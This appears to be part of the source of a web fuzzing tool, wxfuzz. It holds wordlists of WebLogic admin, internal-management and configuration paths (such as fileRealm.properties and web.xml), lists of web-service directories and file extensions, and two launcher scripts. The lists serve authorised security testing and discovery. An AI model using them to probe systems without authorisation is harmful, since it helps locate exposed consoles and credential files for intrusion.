2 | *.gif
3 | *.gif/
4 | *.html
5 | *.jsp
6 | *.jsp/
7 | *.jws
8 | *.shtml/
9 | AdminCaptureRootCA
10 | AdminClients
11 | AdminConnections
12 | AdminEvents
13 | AdminJDBC
14 | AdminLicense
15 | AdminMain
16 | AdminProps
17 | AdminRealm
18 | AdminThreads
19 | AdminVersion
20 | BizTalkServer
21 | Bootstrap
22 | Certificate
23 | Classpath/
24 | ConsoleHelp/
25 | ConsoleHelp
26 | DefaultWebApp
27 | HTTPClntClose
28 | HTTPClntLogin
29 | HTTPClntRecv
30 | HTTPClntSend
31 | LogfileSearch
32 | LogfileTail
33 | Login.jsp
34 | MANIFEST.MF
35 | META-INF
36 | SimpappServlet
37 | StockServlet
38 | T3AdminMain
39 | UniversityServlet
40 | WEB-INF
41 | WEB-INF./web.xml
42 | WEB-INF/web.xml
43 | WLDummyInitJVMIDs
44 | WebServiceServlet
45 | _tmp_war
46 | _tmp_war_DefaultWebApp
47 | a2e2gp2r2/x.jsp
48 | actions
49 | admin/login.do
50 | applet
51 | applications
52 | authenticatedy
53 | bea_wls_internal/classes/
54 | bea_wls_internal/classes/
55 | bea_wls_internal/WebServiceServlet
56 | bea_wls_internal/getior
57 | bea_wls_internal
58 | bea_wls_internal/HTTPClntSend
59 | bea_wls_internal/HTTPClntRecv
60 | bea_wls_internal/iiop/ClientSend
61 | bea_wls_internal/iiop/ClientRecv
62 | bea_wls_internal/iiop/ClientLogin
63 | bea_wls_internal/WLDummyInitJVMIDs
64 | bea_wls_internal/a2e2gp2r2/x.jsp
65 | bea_wls_internal/psquare/x.jsp
66 | bea_wls_internal/iiop/ClientClose
67 | beanManaged
68 | certificate
69 | classes
70 | classes/
71 | com
72 | common
73 | config
74 | console
75 | cookies
76 | default
77 | docs51
78 | domain
79 | drp-exports
80 | drp-publish
81 | dummy
82 | e2ePortalProject/Login.portal
83 | ejb
84 | ejbSimpappServlet
85 | error
86 | examplesWebApp/EJBeanManagedClient.jsp
87 | examplesWebApp/WebservicesEJB.jsp
88 | examplesWebApp/OrderParser.jsp?xmlfile=C:/bea/weblogic81/samples/server/examples/src/examples/xml/orderParser/order.xml
89 | examplesWebApp/index.jsp
90 | examplesWebApp/InteractiveQuery.jsp
91 | examplesWebApp/SessionServlet
92 | fault
93 | file
94 | file/
95 | fileRealm
96 | fileRealm.properties
97 | getior
98 | graphics
99 | helloKona
100 | helloWorld
101 | iiop/ClientClose
102 | iiop/ClientRecv
103 | iiop/ClientLogin
104 | iiop/ClientSend
105 | images
106 | index
107 | index.jsp
108 | internal
109 | jmssender
110 | jmstrader
111 | jspbuild
112 | jwsdir
113 | login.jsp
114 | manifest.mf
115 | mapping
116 | mydomain
117 | myservlet
118 | page
119 | patient/login.do
120 | patient/register.do
121 | phone
122 | physican/login.do
123 | portalAppAdmin/login.jsp
124 | properties
125 | proxy
126 | psquare/x.jsp
127 | public_html
128 | servlet
129 | servletimages
130 | servlets/
131 | session
132 | simpapp
133 | simple
134 | simpleFormServlet
135 | snoop
136 | survey
137 | system
138 | taglib-uri
139 | uddi
140 | uddi/uddilistener
141 | uddiexplorer
142 | uddilistener
143 | utils
144 | web
145 | web.xml
146 | weblogic
147 | weblogic.properties
148 | weblogic.xml
149 | webservice
150 | webshare
151 | wl_management_internal2/FileDistribution
152 | wl_management_internal2/Bootstrap
153 | wl_management_internal2/Admin
154 | wl_management_internal2/wl_management
155 | wl_management_internal1/LogfileTail
156 | wl_management_internal1/LogfileSearch
157 | wl_management_internal1
158 | wl_management
159 | wl_management_internal2
160 | wliconsole
161 | wlserver
162 |
--------------------------------------------------------------------------------
/wordlist/webservices/ws-dirs.txt:
--------------------------------------------------------------------------------
1 | ServiceDefinition
2 | admin
3 | atom
4 | axis
5 | context
6 | default
7 | disco
8 | extwsdl
9 | index
10 | inquire
11 | inquiryapi
12 | inspection
13 | interface
14 | interfaces
15 | jboss-net
16 | jbossws
17 | juddi
18 | manual
19 | methods
20 | name
21 | names
22 | operation
23 | operations
24 | oracle
25 | proxy
26 | publish
27 | publishing
28 | query
29 | rss
30 | service
31 | services
32 | svce
33 | uddi
34 | uddiexplorer
35 | uddigui
36 | uddilistener
37 | uddisoap
38 | webservice
39 | webserviceclient
40 | webserviceclient+ssl
41 | webservices
42 | ws
43 | ws4ee
44 | wsatom
45 | wsdl
46 | wsgw
47 | wsil
48 | xmethods
49 |
--------------------------------------------------------------------------------
/wordlist/webservices/ws-files.txt:
--------------------------------------------------------------------------------
1 |
2 | .asmx
3 | .asmx?wsdl
4 | .aspx
5 | .atom
6 | .disco
7 | .html
8 | .java
9 | .jsp
10 | .jws
11 | .jws?wsdl
12 | .php
13 | .pl
14 | .py
15 | .rss
16 | .svc
17 | .wsdl
18 | ?disco
19 | ?wsdl
20 |
--------------------------------------------------------------------------------
/wxfuzz:
--------------------------------------------------------------------------------
1 | #!/bin/sh
2 | python src/wxfuzz.py $@
3 |
--------------------------------------------------------------------------------
/wxfuzz.bat:
--------------------------------------------------------------------------------
1 | call python src\wxfuzz.py %*
2 |
--------------------------------------------------------------------------------